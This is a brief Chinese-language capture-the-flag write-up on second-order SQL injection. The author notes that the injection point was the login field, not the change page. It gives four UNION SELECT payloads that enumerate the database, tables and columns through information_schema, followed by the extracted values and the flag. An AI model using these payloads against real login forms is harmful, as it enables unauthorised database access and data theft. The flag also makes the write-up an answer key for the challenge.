前言
关键字:[二次注入]
题解
还在change那里试了半天,没想到注入点竟然在登录。应该多试试的唉。
payload:
username =1' union select database() #
username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #
username =1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
username =1' union select flag from flag #
数据库
ctftraining
表
flag,news,users
列
flag
数据
flag{934730c7-4ab2-406b-9c62-819bc6c4e1c6}